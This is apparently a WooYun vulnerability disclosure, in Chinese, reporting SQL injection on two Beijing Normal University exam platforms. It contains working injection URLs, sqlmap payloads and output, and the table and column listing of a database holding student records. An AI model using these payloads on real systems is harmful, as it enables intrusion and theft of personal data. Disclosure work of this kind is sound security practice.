漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:北京师范大学注入打包
提交时间:2015-12-30 19:02
修复时间:2016-02-12 18:49
公开时间:2016-02-12 18:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-12-30: 细节已通知厂商并且等待厂商处理中 2016-01-04: 厂商已经确认,细节仅向厂商公开 2016-01-14: 细节向核心白帽子及相关领域专家公开 2016-01-24: 细节向普通白帽子公开 2016-02-03: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
简要描述: 北京师范大学(Beijing Normal University)简称“北师大”,由中华人民共和国教育部直属,中央直管副部级建制,位列“211工程”、“985工程”,入选国家“珠峰计划”、“2011计划”、“111计划”、“卓越法律人才教育培养计划”,设有研究生院,是一所以教师教育、教育科学和文理基础学科为主要特色的综合性全国重点大学。
详细说明: 1)北京师范大学共训班网上测试平台: http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an y)? [y/N] n sqlmap identified the following injection points with a total of 41 HTTP(s) requ ests: --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=37 AND 5521=5521 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: nid=37 AND (SELECT * FROM (SELECT(SLEEP(1)))jqxg) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: nid=-3919 UNION ALL SELECT NULL,CONCAT(0x71627a6271,0x694d577870716 8434d69,0x716a767a71),NULL,NULL-- --- [15:06:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5 back-end DBMS: MySQL 5.0.12 [15:06:45] [INFO] fetching database names [15:06:46] [INFO] the SQL query used returns 3 entries [15:06:48] [INFO] retrieved: information_schema [15:06:49] [INFO] retrieved: dangxiao_exam [15:06:50] [INFO] retrieved: test available databases [3]: [*] dangxiao_exam [*] information_schema [*] test
2)北京师范大学校规校纪测试平台: http://ldsr.bnu.edu.cn/Index.php/Notice/shownot?nid=-27%20union%20select%201,user%28%29,database%28%29,4
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an y)? [y/N] n sqlmap identified the following injection points with a total of 39 HTTP(s) requ ests: --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=27 AND 5159=5159 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: nid=27 AND (SELECT * FROM (SELECT(SLEEP(1)))fekI) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: nid=-1429 UNION ALL SELECT NULL,CONCAT(0x7170706b71,0x4952726d6c614 34e6f71,0x7170627871),NULL,NULL-- --- [15:03:21] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5 back-end DBMS: MySQL 5.0.12 available databases [3]: [*] exam [*] information_schema [*] test
不忍直视,这么多表 lb_user表泄露7000多学生的姓名,院系,班级等信息
Database: exam +----------------------+---------+ | Table | Entries | +----------------------+---------+ | lb_useranswer | 464898 | | lb_usertestlog | 18189 | | lb_usergroup | 17990 | | lb_user | 7488 | <———————— | lb_usertestlog_all | 4766 | | dede_sys_enum | 3347 | | lb_userquestions | 2658 | | lb_answers | 743 | | dede_area | 482 | | lb_questions | 351 | | dede_sysconfig | 150 | | dede_archives | 136 | | dede_arctiny | 136 | | dede_addonarticle | 135 | | dede_asktype | 35 | | dede_arctype | 21 | | dede_stepselect | 15 | | dede_scores | 12 | | lb_notice | 11 | | dede_co_mediaurls | 10 | | lb_groups | 10 | | dede_uploads | 9 | | dede_arcatt | 8 | | dede_arcrank | 8 | | dede_flinktype | 8 | | dede_plus | 8 | | dede_sys_module | 7 | | dede_ask | 6 | | dede_channeltype | 6 | | dede_shops_paytype | 5 | | dede_payment | 4 | | dede_shops_delivery | 4 | | dede_tagindex | 4 | | dede_taglist | 4 | | lb_tests | 4 | | test | 4 | | dede_admintype | 3 | | dede_co_onepage | 3 | | dede_flink | 3 | | dede_guestbook | 3 | | dede_moneycard_type | 3 | | dede_mytag | 3 | | dede_search_keywords | 3 | | dede_store_groups | 3 | | lb_adminuser | 3 | | dede_freelist | 2 | | dede_member_model | 2 | | dede_member_stowtype | 2 | | dede_sys_set | 2 | | dede_addonspec | 1 | | dede_admin | 1 | | dede_arccache | 1 | | dede_arcmulti | 1 | | dede_askanswer | 1 | | dede_co_note | 1 | | dede_homepageset | 1 | | dede_member | 1 | | dede_member_group | 1 | | dede_member_person | 1 | | dede_member_space | 1 | | dede_member_tj | 1 | | dede_member_type | 1 | | dede_myad | 1 | | dede_mynews | 1 | | dede_softconfig | 1 | | dede_vote | 1 | +----------------------+---------+ Database: exam Table: lb_user [9 columns] +-----------+---------------+ | Column | Type | +-----------+---------------+ | id | mediumint(10) | | password | varchar(32) | | regip | varchar(20) | | regtime | datetime | | useremail | varchar(20) | | username | varchar(15) | | xingming | varchar(45) | | yuanxi | varchar(45) | | zhuanye | varchar(45) | +-----------+---------------+
漏洞证明: 1)北京师范大学共训班网上测试平台: http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an y)? [y/N] n sqlmap identified the following injection points with a total of 41 HTTP(s) requ ests: --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=37 AND 5521=5521 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: nid=37 AND (SELECT * FROM (SELECT(SLEEP(1)))jqxg) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: nid=-3919 UNION ALL SELECT NULL,CONCAT(0x71627a6271,0x694d577870716 8434d69,0x716a767a71),NULL,NULL-- --- [15:06:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5 back-end DBMS: MySQL 5.0.12 [15:06:45] [INFO] fetching database names [15:06:46] [INFO] the SQL query used returns 3 entries [15:06:48] [INFO] retrieved: information_schema [15:06:49] [INFO] retrieved: dangxiao_exam [15:06:50] [INFO] retrieved: test available databases [3]: [*] dangxiao_exam [*] information_schema [*] test
2)北京师范大学校规校纪测试平台: http://ldsr.bnu.edu.cn/Index.php/Notice/shownot?nid=-27%20union%20select%201,user%28%29,database%28%29,4
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an y)? [y/N] n sqlmap identified the following injection points with a total of 39 HTTP(s) requ ests: --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=27 AND 5159=5159 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: nid=27 AND (SELECT * FROM (SELECT(SLEEP(1)))fekI) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: nid=-1429 UNION ALL SELECT NULL,CONCAT(0x7170706b71,0x4952726d6c614 34e6f71,0x7170627871),NULL,NULL-- --- [15:03:21] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5 back-end DBMS: MySQL 5.0.12 available databases [3]: [*] exam [*] information_schema [*] test
不忍直视,这么多表 lb_user表泄露7000多学生的姓名,院系,班级等信息
Database: exam +----------------------+---------+ | Table | Entries | +----------------------+---------+ | lb_useranswer | 464898 | | lb_usertestlog | 18189 | | lb_usergroup | 17990 | | lb_user | 7488 | <———————— | lb_usertestlog_all | 4766 | | dede_sys_enum | 3347 | | lb_userquestions | 2658 | | lb_answers | 743 | | dede_area | 482 | | lb_questions | 351 | | dede_sysconfig | 150 | | dede_archives | 136 | | dede_arctiny | 136 | | dede_addonarticle | 135 | | dede_asktype | 35 | | dede_arctype | 21 | | dede_stepselect | 15 | | dede_scores | 12 | | lb_notice | 11 | | dede_co_mediaurls | 10 | | lb_groups | 10 | | dede_uploads | 9 | | dede_arcatt | 8 | | dede_arcrank | 8 | | dede_flinktype | 8 | | dede_plus | 8 | | dede_sys_module | 7 | | dede_ask | 6 | | dede_channeltype | 6 | | dede_shops_paytype | 5 | | dede_payment | 4 | | dede_shops_delivery | 4 | | dede_tagindex | 4 | | dede_taglist | 4 | | lb_tests | 4 | | test | 4 | | dede_admintype | 3 | | dede_co_onepage | 3 | | dede_flink | 3 | | dede_guestbook | 3 | | dede_moneycard_type | 3 | | dede_mytag | 3 | | dede_search_keywords | 3 | | dede_store_groups | 3 | | lb_adminuser | 3 | | dede_freelist | 2 | | dede_member_model | 2 | | dede_member_stowtype | 2 | | dede_sys_set | 2 | | dede_addonspec | 1 | | dede_admin | 1 | | dede_arccache | 1 | | dede_arcmulti | 1 | | dede_askanswer | 1 | | dede_co_note | 1 | | dede_homepageset | 1 | | dede_member | 1 | | dede_member_group | 1 | | dede_member_person | 1 | | dede_member_space | 1 | | dede_member_tj | 1 | | dede_member_type | 1 | | dede_myad | 1 | | dede_mynews | 1 | | dede_softconfig | 1 | | dede_vote | 1 | +----------------------+---------+ Database: exam Table: lb_user [9 columns] +-----------+---------------+ | Column | Type | +-----------+---------------+ | id | mediumint(10) | | password | varchar(32) | | regip | varchar(20) | | regtime | datetime | | useremail | varchar(20) | | username | varchar(15) | | xingming | varchar(45) | | yuanxi | varchar(45) | | zhuanye | varchar(45) | +-----------+---------------+
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2016-01-04 08:01
厂商回复: 感谢
最新状态: 暂无